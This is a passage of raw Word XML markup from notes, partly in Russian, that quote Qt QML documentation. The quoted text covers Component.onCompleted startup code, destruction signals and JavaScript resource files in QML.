      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> as the QML environment may not have been fully established.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00495F97" w:rsidRPr="00D815C8" w:rsidRDefault="00B1764B"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For example, some objects might not have been created or some</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId48" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>property bindings</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may not have been established.</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highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Example of the problem</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00495F97" w:rsidRPr="00D815C8" w:rsidRDefault="001C17D3"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A QML object will emit the</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highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Component.completed</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId49" w:anchor="attached-signal-handlers" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>attached signal</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when its instantiation is complete.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00495F97" w:rsidRPr="00D815C8" w:rsidRDefault="001C17D3"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JavaScript code in the corresponding </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Component.onCompleted</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> handler runs after the object is instantiated. Thus, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>the best place to write application startup code is in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Component.onCompleted</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> handler of the top-level object</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>, because this object emits </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Component.completed</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> when the QML environment is fully established.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC3FA0" w:rsidRPr="00D815C8" w:rsidRDefault="00CC3FA0" w:rsidP="00CC3FA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QtQuick</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55FF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>2.0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC3FA0" w:rsidRPr="00D815C8" w:rsidRDefault="00CC3FA0" w:rsidP="00CC3FA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CC3FA0" w:rsidRPr="00D815C8" w:rsidRDefault="00CC3FA0" w:rsidP="00CC3FA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Rectangle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CC3FA0" w:rsidRPr="00D815C8" w:rsidRDefault="00CC3FA0" w:rsidP="00CC3FA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startupFunction() {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC3FA0" w:rsidRPr="00D815C8" w:rsidRDefault="00CC3FA0" w:rsidP="00CC3FA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 ... startup code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC3FA0" w:rsidRPr="00D815C8" w:rsidRDefault="00CC3FA0" w:rsidP="00CC3FA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CC3FA0" w:rsidRPr="00D815C8" w:rsidRDefault="00CC3FA0" w:rsidP="00CC3FA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CC3FA0" w:rsidRPr="00D815C8" w:rsidRDefault="00CC3FA0" w:rsidP="00CC3FA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Component</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:eastAsia="Times New Roman" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="FFFFFF"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.onCompleted: startupFunction();</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CC3FA0" w:rsidRPr="00D815C8" w:rsidRDefault="00CC3FA0" w:rsidP="00CC3FA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1C17D3" w:rsidRPr="00D815C8" w:rsidRDefault="0066105E"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Any object in a QML file - including </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5B4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nested objects</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> and nested QML component instances - can use this attached property. If there is more than one </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>onCompleted()</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> handler to execute at startup, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>they are run sequentially in an undefined order</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00495F97" w:rsidRPr="00D815C8" w:rsidRDefault="0066105E"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Likewise, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>every</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="HTML2"/>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Component</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>will emit a</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId50" w:anchor="destruction-signal" w:history="1">
        <w:r w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="17A81A"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:highlight w:val="yellow"/>
            <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>destruction()</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>signal</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> just before being destroyed.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00867818" w:rsidRPr="00D815C8" w:rsidRDefault="00867818" w:rsidP="008E5B4D">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="69" w:name="_Toc382058569"/>
      <w:bookmarkStart w:id="70" w:name="_Toc483000533"/>
      <w:bookmarkStart w:id="71" w:name="_Toc483603893"/>
      <w:bookmarkStart w:id="72" w:name="_Toc483605113"/>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">ОПРЕДЕЛЕНИЕ JAVA SCRIPT РЕСУРСОВ В </w:t>
      </w:r>
      <w:r w:rsidR="009B0257" w:rsidRPr="00D815C8">
        <w:rPr>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>QML</w:t>
      </w:r>
      <w:bookmarkEnd w:id="69"/>
      <w:bookmarkEnd w:id="70"/>
      <w:bookmarkEnd w:id="71"/>
      <w:bookmarkEnd w:id="72"/>
    </w:p>
    <w:p w:rsidR="0066105E" w:rsidRPr="00D815C8" w:rsidRDefault="00490E7E" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rStyle w:val="a3"/>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId51" w:history="1">
        <w:r w:rsidR="005A6BBD" w:rsidRPr="00D815C8">
          <w:rPr>
            <w:rStyle w:val="a3"/>
            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://qt-project.org/doc/qt-5.1/qtqml/qtqml-javascript-resources.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="005A6BBD" w:rsidRPr="00D815C8" w:rsidRDefault="0066105E" w:rsidP="00F15C30">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>The program logic for a QML application may be defined in JavaScript.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> The JavaScript code may either </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>be defined in-line</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> in QML documents, or </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>separated into JavaScript files</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> (known as </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>JavaScript Resources</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> in QML).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0066105E" w:rsidRPr="00D815C8" w:rsidRDefault="00396ECC"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There are two different kinds of JavaScript resources which are supported in QML: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>code-behind implementation files</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, and </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>shared (library) files</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00396ECC" w:rsidRPr="00D815C8" w:rsidRDefault="00396ECC" w:rsidP="008E5B4D">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="73" w:name="_Toc483000534"/>
      <w:bookmarkStart w:id="74" w:name="_Toc483603894"/>
      <w:bookmarkStart w:id="75" w:name="_Toc483605114"/>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Code-Behind Implementation Resource</w:t>
      </w:r>
      <w:bookmarkEnd w:id="73"/>
      <w:bookmarkEnd w:id="74"/>
      <w:bookmarkEnd w:id="75"/>
    </w:p>
    <w:p w:rsidR="0066105E" w:rsidRPr="00D815C8" w:rsidRDefault="00782E40"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Most JavaScript files imported into a QML document are </w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>stateful implementations for the QML document</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> importing them. In these cases, each instance of the QML object type defined in the document requires a separate copy of the JavaScript objects and state in order to behave correctly.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0066105E" w:rsidRPr="00D815C8" w:rsidRDefault="00782E40"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The default behavior when importing JavaScript files is to provide a unique, isolated copy for each QML component instance. </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5B4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>If that JavaScript file does not import any resources or modules with a </w:t>
      </w:r>
      <w:r w:rsidRPr="008E5B4D">
        <w:rPr>
          <w:rFonts w:ascii="Droid Sans Mono" w:hAnsi="Droid Sans Mono" w:cs="Courier New"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.import</w:t>
      </w:r>
      <w:r w:rsidRPr="008E5B4D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="404244"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t> statement</w:t>
      </w:r>
      <w:r w:rsidRPr="00D815C8">
        <w:rPr>
